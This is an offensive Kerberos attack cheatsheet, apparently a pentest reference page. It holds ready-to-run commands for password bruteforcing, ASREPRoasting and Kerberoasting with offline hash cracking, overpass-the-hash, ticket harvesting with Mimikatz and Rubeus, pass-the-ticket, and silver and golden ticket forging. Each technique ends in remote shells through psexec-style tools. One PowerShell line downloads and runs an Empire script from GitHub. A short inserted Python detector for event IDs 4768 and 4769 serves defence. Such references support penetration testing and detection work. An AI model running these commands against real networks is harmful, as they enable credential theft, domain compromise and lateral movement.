
Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

```shell
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
```

With the Rubeus version that includes the brute module:

```shell
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in the current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```

ASREPRoast

With Impacket example GetNPUsers.py:

```shell
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
```

With Rubeus:

```shell
# check ASREPRoast for all users in the current domain
.\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
```

Cracking with dictionary of passwords:

```shell
hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>

john --wordlist=<passwords_file> <AS_REP_responses_file>
```

Kerberoasting

With Impacket example GetUserSPNs.py:

```shell
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
```

With Rubeus:

```shell
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>
```

With PowerShell:

```shell
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>
```

Cracking with dictionary of passwords:

```shell
hashcat -m 13100 --force <TGSs_file> <passwords_file>

john --format=krb5tgs --wordlist=<passwords_file> <TGSs_file>
```
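Added example, not part of the original cheatsheet: detection logic for the ASREPRoast and Kerberoasting activity covered in the two sections above, run over constructed sample events written in a simplified key=value form whose field names mirror Windows Security events 4768 (TGT request) and 4769 (service ticket request). The threshold and the sample values are assumptions; the RC4 focus matches the page's hashcat modes 18200 and 13100, which crack the etype 23 (RC4) variants.

```python
from collections import defaultdict

# Constructed sample events (not real log output) in a simplified key=value form.
# Field names mirror Windows Security events 4768 (AS-REQ/TGT) and 4769 (TGS-REQ);
# EncType 0x17 is RC4-HMAC, 0x12 is AES256; PreAuthType 0 means no pre-authentication.
SAMPLE_EVENTS = """
EventID=4769 Account=alice@CORP.LOCAL Service=MSSQLSvc/db01.corp.local EncType=0x17 Client=10.0.0.5
EventID=4769 Account=alice@CORP.LOCAL Service=HTTP/web01.corp.local EncType=0x17 Client=10.0.0.5
EventID=4769 Account=alice@CORP.LOCAL Service=ldap/dc01.corp.local EncType=0x17 Client=10.0.0.5
EventID=4769 Account=bob@CORP.LOCAL Service=cifs/fs01.corp.local EncType=0x12 Client=10.0.0.7
EventID=4768 Account=svc_backup@CORP.LOCAL Service=krbtgt/CORP.LOCAL EncType=0x17 PreAuthType=0 Client=10.0.0.9
EventID=4768 Account=carol@CORP.LOCAL Service=krbtgt/CORP.LOCAL EncType=0x12 PreAuthType=2 Client=10.0.0.8
""".strip().splitlines()

RC4_HMAC = "0x17"
ROAST_SPN_THRESHOLD = 3  # distinct RC4 service tickets per (account, client); assumed tuning value

def parse_event(line: str) -> dict:
    """Split 'key=value key=value ...' into a dict (values contain no spaces here)."""
    return dict(token.split("=", 1) for token in line.split())

def detect(lines, threshold=ROAST_SPN_THRESHOLD):
    """Return (kind, account, client) findings for ASREPRoast and Kerberoast patterns."""
    findings = []
    rc4_spns = defaultdict(set)
    for ev in map(parse_event, lines):
        # ASREPRoast: a TGT issued without pre-authentication, which the KDC only does
        # for accounts that have pre-authentication disabled; that AS-REP is what gets cracked.
        if ev["EventID"] == "4768" and ev.get("PreAuthType") == "0":
            findings.append(("asreproast", ev["Account"], ev["Client"]))
        # Kerberoast: one principal requesting RC4 service tickets for many distinct SPNs.
        elif ev["EventID"] == "4769" and ev["EncType"] == RC4_HMAC:
            rc4_spns[(ev["Account"], ev["Client"])].add(ev["Service"])
    for (account, client), spns in rc4_spns.items():
        if len(spns) >= threshold:
            findings.append(("kerberoast", account, client))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Accounts with pre-authentication disabled and service accounts still allowed RC4 are the two conditions these requests depend on; enforcing pre-auth and AES-only keys on them removes the crackable material at the source.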

Overpass The Hash/Pass The Key (PTK)

By using Impacket examples:

```shell
# Request the TGT with a hash
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
# Request the TGT with an AES key (stronger encryption and probably stealthier, since it is the type Windows uses by default)
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
# Request the TGT with a password
python getTGT.py <domain_name>/<user_name>:[password]
# If the password is not provided, it is prompted for

# Set the TGT for impacket use
export KRB5CCNAME=<TGT_ccache_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

With Rubeus and PsExec:

```shell
# Ask for the ticket and inject it
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

# Execute a cmd on the remote machine
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

Pass The Ticket (PTT)

Harvest tickets from Linux

Check type and location of tickets:

```shell
grep default_ccache_name /etc/krb5.conf
```

If nothing is returned, the default is FILE:/tmp/krb5cc_%{uid}.

In the case of file tickets, you can copy them (if you have permissions) in order to use them.

In the case of KEYRING tickets, you can use tickey to get them:

```shell
# Dumps the current user's tickets; if run as root, it tries to dump all of them by injecting into other users' processes
# to inject, copy tickey to a folder reachable by all users
cp tickey /tmp/tickey
/tmp/tickey -i
```

Harvest tickets from Windows

With Mimikatz:

```shell
mimikatz # sekurlsa::tickets /export
```

With Rubeus in Powershell:

```shell
.\Rubeus.exe dump

# After dumping with Rubeus, the tickets are in base64; to write one to a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64_ticket>"))
```

To convert tickets between Linux/Windows format with ticket_converter.py:

```shell
python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi
```

Using a ticket in Linux

With Impacket examples:

```shell
# Set the ticket for impacket use
export KRB5CCNAME=<ticket_ccache_file>

# Execute remote commands with any of the following by using the ticket
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

Using a ticket in Windows

Inject the ticket with Mimikatz:

```shell
mimikatz # kerberos::ptt <ticket_kirbi_file>
```

Inject the ticket with Rubeus:

```shell
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
```

Execute a cmd on the remote machine with PsExec:

```shell
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

Silver ticket

With Impacket examples:

```shell
# To generate the TGS with an NTLM hash
python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

# To generate the TGS with an AES key
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>

# Execute remote commands with any of the following by using the TGS
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

With Mimikatz:

```shell
# To generate the TGS with an NTLM hash
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

# To generate the TGS with an AES 128 key
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

# To generate the TGS with an AES 256 key (stronger encryption and probably stealthier, since it is the type Windows uses by default)
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

# Inject the TGS with Mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>
```

Inject the ticket with Rubeus:

```shell
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
```

Execute a cmd on the remote machine with PsExec:

```shell
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

Golden ticket

With Impacket examples:

```shell
# To generate the TGT with the krbtgt NTLM hash
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

# To generate the TGT with the krbtgt AES key
python ticketer.py -aesKey <krbtgt_aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

With Mimikatz:

```shell
# To generate the TGT with the krbtgt NTLM hash
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>

# To generate the TGT with the krbtgt AES 128 key
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>

# To generate the TGT with the krbtgt AES 256 key (stronger encryption and probably stealthier, since it is the type Windows uses by default)
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>

# Inject the TGT with Mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>
```

Inject the ticket with Rubeus:

```shell
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
```

Execute a cmd on the remote machine with PsExec:

```shell
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

Misc

To get the NTLM (NT) hash from a password (Python 3; needs an OpenSSL build that still exposes md4, which on OpenSSL 3 means the legacy provider):

```shell
python3 -c 'import hashlib; print(hashlib.new("md4", "<password>".encode("utf-16le")).hexdigest())'
```

Tools


Author: Puckiestyle